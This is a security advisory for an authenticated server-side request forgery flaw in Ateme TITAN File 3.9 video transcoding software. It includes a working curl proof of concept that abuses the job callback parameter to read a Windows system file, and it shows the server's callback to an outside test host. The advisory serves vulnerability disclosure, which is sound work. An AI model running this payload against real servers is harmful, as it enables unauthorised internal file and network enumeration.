Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.9.12.4 3.9.11.0 3.9.9.2 3.9.8.0 Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing. Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application. Tested on: Microsoft Windows NodeJS Ateme KFE Software Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5781 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php 22.04.2023 -- curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ -H "User-Agent: sunee-mode" \ "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>" Call to file://C:\\windows\\system.ini returned 0 --- HTTP from Server ---------------- POST / HTTP/1.1 Host: ssrftest.zeroscience.mk Accept: */* Content-Type: application/xml Content-Length: 192 <?xml version='1.0' encoding='UTF-8' ?> <update> <id>0000</id> <name>dummy test job</name> <status>aborted</status> <progress>50</progress> <message>message</message> </update>